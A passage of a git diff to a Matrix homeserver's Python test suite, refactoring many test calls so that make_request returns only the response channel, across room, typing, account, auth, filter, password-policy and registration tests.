"+ channel = self.make_request(\"PUT\", path, '{\"_name\":\"bo\"}')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, '{\"nao')", + "+ channel = self.make_request(\"PUT\", path, '{\"nao')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(", + "- \"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", + "- )", + "+ channel = self.make_request(\"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, \"text only\")", + "+ channel = self.make_request(\"PUT\", path, \"text only\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, \"\")", + "+ channel = self.make_request(\"PUT\", path, \"\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -568,3 +562,3 @@ class RoomMemberStateTestCase(RoomBase):", + " )", + "- request, channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", + "+ channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -579,6 +573,6 @@ class RoomMemberStateTestCase(RoomBase):", + " content = '{\"membership\":\"%s\"}' % Membership.JOIN", + "- request, channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", + "+ channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"GET\", path, None)", + "+ channel = self.make_request(\"GET\", path, None)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -597,6 +591,6 @@ class RoomMemberStateTestCase(RoomBase):", + " content = '{\"membership\":\"%s\"}' % Membership.INVITE", + "- request, channel = self.make_request(\"PUT\", path, content)", + "+ channel = self.make_request(\"PUT\", path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"GET\", path, None)", + "+ channel = self.make_request(\"GET\", path, None)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -616,6 +610,6 @@ class RoomMemberStateTestCase(RoomBase):", + " )", + "- request, channel = self.make_request(\"PUT\", path, content)", + "+ channel = self.make_request(\"PUT\", path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"GET\", path, None)", + "+ channel = self.make_request(\"GET\", path, None)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -670,3 +664,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", + " path = \"/_matrix/client/r0/profile/%s/displayname\" % self.user_id", + "- request, channel = self.make_request(\"PUT\", path, {\"displayname\": \"John Doe\"})", + "+ channel = self.make_request(\"PUT\", path, {\"displayname\": \"John Doe\"})", + " self.assertEquals(channel.code, 200, channel.json_body)", + "@@ -680,3 +674,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", + "- request, channel = self.make_request(\"GET\", path)", + "+ channel = self.make_request(\"GET\", path)", + " self.assertEquals(channel.code, 200)", + "@@ -704,3 +698,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", + " for i in range(4):", + "- request, channel = self.make_request(\"POST\", path % room_id, {})", + "+ channel = self.make_request(\"POST\", path % room_id, {})", + " self.assertEquals(channel.code, 200)", + "@@ -733,20 +727,18 @@ class RoomMessagesTestCase(RoomBase):", + " # missing keys or invalid json", + "- request, channel = self.make_request(\"PUT\", path, b\"{}\")", + "+ channel = self.make_request(\"PUT\", path, b\"{}\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, b'{\"_name\":\"bo\"}')", + "+ channel = self.make_request(\"PUT\", path, b'{\"_name\":\"bo\"}')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, b'{\"nao')", + "+ channel = self.make_request(\"PUT\", path, b'{\"nao')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(", + "- \"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", + "- )", + "+ channel = self.make_request(\"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, b\"text only\")", + "+ channel = self.make_request(\"PUT\", path, b\"text only\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, b\"\")", + "+ channel = self.make_request(\"PUT\", path, b\"\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -757,3 +749,3 @@ class RoomMessagesTestCase(RoomBase):", + " content = b'{\"body\":\"test\",\"msgtype\":{\"type\":\"a\"}}'", + "- request, channel = self.make_request(\"PUT\", path, content)", + "+ channel = self.make_request(\"PUT\", path, content)", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -762,3 +754,3 @@ class RoomMessagesTestCase(RoomBase):", + " content = b'{\"body\":\"test\",\"msgtype\":\"test.custom.text\"}'", + "- request, channel = self.make_request(\"PUT\", path, content)", + "+ channel = self.make_request(\"PUT\", path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -768,3 +760,3 @@ class RoomMessagesTestCase(RoomBase):", + " content = b'{\"body\":\"test2\",\"msgtype\":\"m.text\"}'", + "- request, channel = self.make_request(\"PUT\", path, content)", + "+ channel = self.make_request(\"PUT\", path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -782,5 +774,3 @@ class RoomInitialSyncTestCase(RoomBase):", + " def test_initial_sync(self):", + "- request, channel = self.make_request(", + "- \"GET\", \"/rooms/%s/initialSync\" % self.room_id", + "- )", + "+ channel = self.make_request(\"GET\", \"/rooms/%s/initialSync\" % self.room_id)", + " self.assertEquals(200, channel.code)", + "@@ -825,3 +815,3 @@ class RoomMessageListTestCase(RoomBase):", + " token = \"t1-0_0_0_0_0_0_0_0_0\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/rooms/%s/messages?access_token=x&from=%s\" % (self.room_id, token)", + "@@ -836,3 +826,3 @@ class RoomMessageListTestCase(RoomBase):", + " token = \"s0_0_0_0_0_0_0_0_0\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/rooms/%s/messages?access_token=x&from=%s\" % (self.room_id, token)", + "@@ -869,3 +859,3 @@ class RoomMessageListTestCase(RoomBase):", + " # Check that we get the first and second message when querying /messages.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -897,3 +887,3 @@ class RoomMessageListTestCase(RoomBase):", + " # has been purged.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -914,3 +904,3 @@ class RoomMessageListTestCase(RoomBase):", + " # anymore.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -973,3 +963,3 @@ class RoomSearchTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1002,3 +992,3 @@ class RoomSearchTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1050,3 +1040,3 @@ class PublicRoomsRestrictedTestCase(unittest.HomeserverTestCase):", + " def test_restricted_no_auth(self):", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + " self.assertEqual(channel.code, 401, channel.result)", + "@@ -1057,3 +1047,3 @@ class PublicRoomsRestrictedTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", self.url, access_token=tok)", + "+ channel = self.make_request(\"GET\", self.url, access_token=tok)", + " self.assertEqual(channel.code, 200, channel.result)", + "@@ -1085,3 +1075,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(data)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -1098,3 +1088,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(data)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -1108,3 +1098,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1141,3 +1131,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1155,3 +1145,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1169,3 +1159,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1183,3 +1173,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1195,3 +1185,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1207,3 +1197,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1226,3 +1216,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " reason = \"hello\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -1237,3 +1227,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", + " def _check_for_reason(self, reason):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1286,3 +1276,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1316,3 +1306,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1351,3 +1341,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1379,3 +1369,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + " token = \"s0_0_0_0_0_0_0_0_0\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1396,3 +1386,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + " token = \"s0_0_0_0_0_0_0_0_0\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1419,3 +1409,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + " token = \"s0_0_0_0_0_0_0_0_0\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1450,3 +1440,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", + "@@ -1485,3 +1475,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", + "@@ -1532,3 +1522,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", + "@@ -1653,3 +1643,3 @@ class ContextTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1717,3 +1707,3 @@ class ContextTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1807,3 +1797,3 @@ class RoomAliasListTestCase(unittest.HomeserverTestCase):", + " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1828,3 +1818,3 @@ class RoomAliasListTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url, request_data, access_token=self.room_owner_tok", + "@@ -1858,3 +1848,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url, request_data, access_token=self.room_owner_tok", + "@@ -1865,3 +1855,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", + " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -1877,3 +1867,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", + " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "diff --git a/tests/rest/client/v1/test_typing.py b/tests/rest/client/v1/test_typing.py", + "index ae0207366..38c51525a 100644", + "--- a/tests/rest/client/v1/test_typing.py", + "+++ b/tests/rest/client/v1/test_typing.py", + "@@ -96,3 +96,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", + " def test_set_typing(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -119,3 +119,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", + " def test_set_not_typing(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -127,3 +127,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", + " def test_typing_timeout(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -140,3 +140,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "diff --git a/tests/rest/client/v1/utils.py b/tests/rest/client/v1/utils.py", + "index 5a18af8d3..3d46117e6 100644", + "--- a/tests/rest/client/v1/utils.py", + "+++ b/tests/rest/client/v1/utils.py", + "@@ -83,3 +83,3 @@ class RestHelper:", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -159,3 +159,3 @@ class RestHelper:", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -194,3 +194,3 @@ class RestHelper:", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -250,5 +250,3 @@ class RestHelper:", + "- _, channel = make_request(", + "- self.hs.get_reactor(), self.site, method, path, content", + "- )", + "+ channel = make_request(self.hs.get_reactor(), self.site, method, path, content)", + "@@ -335,3 +333,3 @@ class RestHelper:", + " path = \"/_matrix/media/r0/upload?filename=%s\" % (filename,)", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -368,3 +366,3 @@ class RestHelper:", + " # first hit the redirect url (which will issue a cookie and state)", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -413,3 +411,3 @@ class RestHelper:", + " # now hit the callback URI with the right params and a made-up code", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "@@ -436,3 +434,3 @@ class RestHelper:", + " # matrix access token and device id.", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.hs.get_reactor(),", + "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", + "index 8a898be24..cb87b80e3 100644", + "--- a/tests/rest/client/v2_alpha/test_account.py", + "+++ b/tests/rest/client/v2_alpha/test_account.py", + "@@ -242,3 +242,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + " def _request_token(self, email, client_secret):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -256,3 +256,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + " # Load the password reset confirmation page", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -270,3 +270,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + " # Confirm the password reset", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -304,3 +304,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", + " ):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -346,3 +346,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", + " # Check that this access token has been invalidated.", + "- request, channel = self.make_request(\"GET\", \"account/whoami\")", + "+ channel = self.make_request(\"GET\", \"account/whoami\")", + " self.assertEqual(channel.code, 401)", + "@@ -401,3 +401,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"account/deactivate\", request_data, access_token=tok", + "@@ -524,3 +524,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -542,3 +542,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "@@ -563,3 +563,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -572,3 +572,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "@@ -595,3 +595,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -606,3 +606,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "@@ -623,3 +623,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Attempt to add email without clicking the link", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -641,3 +641,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "@@ -656,3 +656,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Attempt to add email without even requesting an email", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -674,3 +674,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "@@ -778,5 +778,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"POST\", b\"account/3pid/email/requestToken\", body,", + "- )", + "+ channel = self.make_request(\"POST\", b\"account/3pid/email/requestToken\", body,)", + " self.assertEquals(expect_code, channel.code, channel.result)", + "@@ -788,3 +786,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " ):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -801,3 +799,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", path, shorthand=False)", + "+ channel = self.make_request(\"GET\", path, shorthand=False)", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -835,3 +833,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -853,3 +851,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_3pid, access_token=self.user_id_tok,", + "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", + "index a35c2646f..da866c8b4 100644", + "--- a/tests/rest/client/v2_alpha/test_auth.py", + "+++ b/tests/rest/client/v2_alpha/test_auth.py", + "@@ -69,5 +69,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", + " \"\"\"Make a register request.\"\"\"", + "- request, channel = self.make_request(", + "- \"POST\", \"register\", body", + "- ) # type: SynapseRequest, FakeChannel", + "+ channel = self.make_request(\"POST\", \"register\", body)", + "@@ -83,8 +81,8 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"auth/m.login.recaptcha/fallback/web?session=\" + session", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel.code, 200)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -186,3 +184,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # Get the list of devices so one can be deleted.", + "- _, channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", + "+ channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", + " self.assertEqual(channel.code, 200)", + "@@ -198,5 +196,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " \"\"\"Delete an individual device.\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", \"devices/\" + device, body, access_token=access_token,", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + "@@ -211,5 +209,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", + " # the payload half-way through some tests.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"delete_devices\", body, access_token=self.user_tok,", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + "diff --git a/tests/rest/client/v2_alpha/test_capabilities.py b/tests/rest/client/v2_alpha/test_capabilities.py", + "index 767e12687..e808339fb 100644", + "--- a/tests/rest/client/v2_alpha/test_capabilities.py", + "+++ b/tests/rest/client/v2_alpha/test_capabilities.py", + "@@ -38,3 +38,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", + " def test_check_auth_required(self):", + "- request, channel = self.make_request(\"GET\", self.url)", + "+ channel = self.make_request(\"GET\", self.url)", + "@@ -46,3 +46,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", + "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", + " capabilities = channel.json_body[\"capabilities\"]", + "@@ -64,3 +64,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", + "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", + " capabilities = channel.json_body[\"capabilities\"]", + "@@ -72,3 +72,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", + " self.get_success(self.store.user_set_password_hash(user, None))", + "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", + "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", + " capabilities = channel.json_body[\"capabilities\"]", + "diff --git a/tests/rest/client/v2_alpha/test_filter.py b/tests/rest/client/v2_alpha/test_filter.py", + "index 231d5aefe..f761c4493 100644", + "--- a/tests/rest/client/v2_alpha/test_filter.py", + "+++ b/tests/rest/client/v2_alpha/test_filter.py", + "@@ -38,3 +38,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_add_filter(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -51,3 +51,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_add_filter_for_other_user(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -63,3 +63,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " self.hs.is_mine = lambda target_user: False", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -81,3 +81,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " filter_id = filter_id.result", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/user/%s/filter/%s\" % (self.user_id, filter_id)", + "@@ -89,3 +89,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_get_filter_non_existant(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/user/%s/filter/12382148321\" % (self.user_id)", + "@@ -99,3 +99,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_get_filter_invalid_id(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/user/%s/filter/foobar\" % (self.user_id)", + "@@ -107,3 +107,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", + " def test_get_filter_no_id(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/client/r0/user/%s/filter/\" % (self.user_id)", + "diff --git a/tests/rest/client/v2_alpha/test_password_policy.py b/tests/rest/client/v2_alpha/test_password_policy.py", + "index ee86b9491..fba34def3 100644", + "--- a/tests/rest/client/v2_alpha/test_password_policy.py", + "+++ b/tests/rest/client/v2_alpha/test_password_policy.py", + "@@ -72,5 +72,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", \"/_matrix/client/r0/password_policy\"", + "- )", + "+ channel = self.make_request(\"GET\", \"/_matrix/client/r0/password_policy\")", + "@@ -91,3 +89,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"shorty\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -100,3 +98,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"longerpassword\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -109,3 +107,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"l0ngerpassword\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -118,3 +116,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"l0ngerpassword!\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -127,3 +125,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"L0NGERPASSWORD!\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -136,3 +134,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"L0ngerpassword!\"})", + "- request, channel = self.make_request(\"POST\", self.register_url, request_data)", + "+ channel = self.make_request(\"POST\", self.register_url, request_data)", + "@@ -162,3 +160,3 @@ class PasswordPolicyTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "diff --git a/tests/rest/client/v2_alpha/test_register.py b/tests/rest/client/v2_alpha/test_register.py", + "index 4bf3e0d63..27db4f551 100644", + "--- a/tests/rest/client/v2_alpha/test_register.py", + "+++ b/tests/rest/client/v2_alpha/test_register.py", + "@@ -63,3 +63,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", self.url + b\"?access_token=i_am_an_app_service\", request_data", + "@@ -74,3 +74,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\"})", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", self.url + b\"?access_token=i_am_an_app_service\", request_data", + "@@ -82,3 +82,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": \"kermit\", \"password\": 666})", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -89,3 +89,3 @@ class RegisterRestServletTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps({\"username\": 777, \"password\": \"monkey\"})", + "- request, channel = self.make_request(b\"POST\", self.url, request_data)", + "+ channel = self.make_request(b\"POST\", self.url, request_data)", + "@@ -104,3 +104,3 @@ class 